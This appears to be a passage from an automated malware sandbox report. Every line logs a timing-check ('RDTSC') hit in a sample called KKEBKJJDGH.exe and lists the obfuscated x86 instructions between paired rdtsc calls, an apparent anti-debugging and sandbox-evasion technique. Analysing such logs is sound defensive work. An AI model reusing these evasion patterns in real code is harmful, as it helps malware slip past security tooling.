Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 463FB0 second address: 463FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 464101 second address: 464114 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F742CEB81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 464114 second address: 46411A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4628BA second address: 4628C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 463030 second address: 463034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 463034 second address: 46303A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46431F second address: 464325 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 464325 second address: 46432F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F742CEB81C6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46432F second address: 46433D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46433D second address: 464347 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 466CC4 second address: 466CE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F742CC44208h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F742CC44210h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 466CE8 second address: 466D23 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F742CEB81C6h 0x00000008 jnl 00007F742CEB81C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F742CEB81D2h 0x00000017 jmp 00007F742CEB81D7h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 466EA1 second address: 466ED1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F742CC44206h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007F742CC4420Dh 0x00000018 popad 0x00000019 popad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F742CC4420Bh 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 466ED1 second address: 466ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 466ED5 second address: 466EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 466EDB second address: 466EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F742CEB81C6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 467042 second address: 467051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F742CC44206h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 467051 second address: 46706F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46706F second address: 467075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 467075 second address: 46707B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4675AB second address: 4675DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F742CC44216h 0x00000010 jmp 00007F742CC4420Fh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4675DB second address: 4675DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46AAEC second address: 46AAF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46B8AD second address: 46B903 instructions: 0x00000000 rdtsc 0x00000002 je 00007F742CEB81CCh 0x00000008 jno 00007F742CEB81C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebx 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F742CEB81C8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov esi, dword ptr [ebp+122D1B4Eh] 0x00000031 nop 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F742CEB81D8h 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46B903 second address: 46B907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46BD1A second address: 46BD1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46BE02 second address: 46BE1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC44214h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46BE6A second address: 46BE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46BE6E second address: 46BE72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46BE72 second address: 46BE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46BE78 second address: 46BE8B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jno 00007F742CC44206h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46C394 second address: 46C39E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F742CEB81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46C39E second address: 46C3A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F742CC44206h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46C3A8 second address: 46C3BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b jns 00007F742CEB81C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46CBC7 second address: 46CBE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44213h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46CBE5 second address: 46CC00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46E899 second address: 46E89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46E89D second address: 46E8A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46E8A3 second address: 46E8A8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46E8A8 second address: 46E92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F742CEB81C8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 jnc 00007F742CEB81D8h 0x0000002a mov dword ptr [ebp+12473A54h], eax 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 sub edi, dword ptr [ebp+122D31C6h] 0x00000039 pop esi 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F742CEB81C8h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 and di, FCC4h 0x0000005b and esi, 54AB21E2h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46E92D second address: 46E934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 470844 second address: 47086F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F742CEB81CCh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47086F second address: 470875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 470875 second address: 4708FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov si, di 0x0000000c push 00000000h 0x0000000e pushad 0x0000000f jno 00007F742CEB81CCh 0x00000015 mov edi, edx 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007F742CEB81D0h 0x0000001e js 00007F742CEB81C9h 0x00000024 movzx eax, si 0x00000027 popad 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F742CEB81C8h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 jg 00007F742CEB81D4h 0x0000004a mov dword ptr [ebp+122D3385h], edi 0x00000050 push eax 0x00000051 pushad 0x00000052 pushad 0x00000053 jmp 00007F742CEB81CEh 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46FC25 second address: 46FC29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46FC29 second address: 46FC2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47261A second address: 47261E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47261E second address: 472622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 473B4E second address: 473B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 473B58 second address: 473BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 add dword ptr [ebp+122D17BDh], esi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F742CEB81C8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b sub di, 7DB7h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007F742CEB81C8h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push ebx 0x0000004f jp 00007F742CEB81C6h 0x00000055 pop ebx 0x00000056 pop eax 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 477AAB second address: 477AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F742CC44206h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 478B13 second address: 478B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81D7h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c je 00007F742CEB81CCh 0x00000012 mov dword ptr [ebp+122D34FEh], edi 0x00000018 push 00000000h 0x0000001a pushad 0x0000001b mov cx, bx 0x0000001e mov dword ptr [ebp+122D17F3h], ecx 0x00000024 popad 0x00000025 mov dword ptr [ebp+122D1BE8h], eax 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F742CEB81C8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 clc 0x00000048 mov dword ptr [ebp+122D1BCAh], ebx 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push ebx 0x00000052 push ecx 0x00000053 pop ecx 0x00000054 pop ebx 0x00000055 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47ABF0 second address: 47AC02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CC4420Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47AC02 second address: 47AC07 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47BBE1 second address: 47BC69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F742CC44206h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F742CC44208h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D2F43h] 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 mov edi, dword ptr [ebp+122DB6A1h] 0x00000038 pop edi 0x00000039 xor dword ptr [ebp+12478177h], eax 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007F742CC44208h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 0000001Dh 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b mov ebx, 7E67FAABh 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F742CC44218h 0x00000068 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47BC69 second address: 47BC7B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007F742CEB81C6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 475B72 second address: 475B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47BC7B second address: 47BC88 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F742CEB81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 477C9D second address: 477CA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47ED49 second address: 47ED4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47ED4E second address: 47ED54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47AD2A second address: 47AD2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47CD7E second address: 47CD82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47DEDE second address: 47DEE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47AD2F second address: 47AD58 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F742CC44218h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jp 00007F742CC44224h 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47CD82 second address: 47CD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47EF2B second address: 47EF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47CD8C second address: 47CD90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47FC94 second address: 47FC9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F742CC44206h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47EF2F second address: 47EF33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47CD90 second address: 47CE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2C98h], esi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 and edi, dword ptr [ebp+124509C2h] 0x0000001d pushad 0x0000001e mov edx, dword ptr [ebp+122D2C98h] 0x00000024 mov edi, 31B07745h 0x00000029 popad 0x0000002a mov dword ptr fs:[00000000h], esp 0x00000031 sub dword ptr [ebp+122D17DDh], edi 0x00000037 mov eax, dword ptr [ebp+122D07A1h] 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007F742CC44208h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 mov edi, ebx 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push eax 0x0000005e call 00007F742CC44208h 0x00000063 pop eax 0x00000064 mov dword ptr [esp+04h], eax 0x00000068 add dword ptr [esp+04h], 0000001Dh 0x00000070 inc eax 0x00000071 push eax 0x00000072 ret 0x00000073 pop eax 0x00000074 ret 0x00000075 jmp 00007F742CC44216h 0x0000007a nop 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f je 00007F742CC44206h 0x00000085 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 47CE38 second address: 47CE42 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F742CEB81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 480BC8 second address: 480BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 mov edi, dword ptr [ebp+122D389Eh] 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 adc dx, 072Fh 0x00000017 cmc 0x00000018 popad 0x00000019 push eax 0x0000001a push esi 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4847A4 second address: 4847A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4847A8 second address: 4847AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
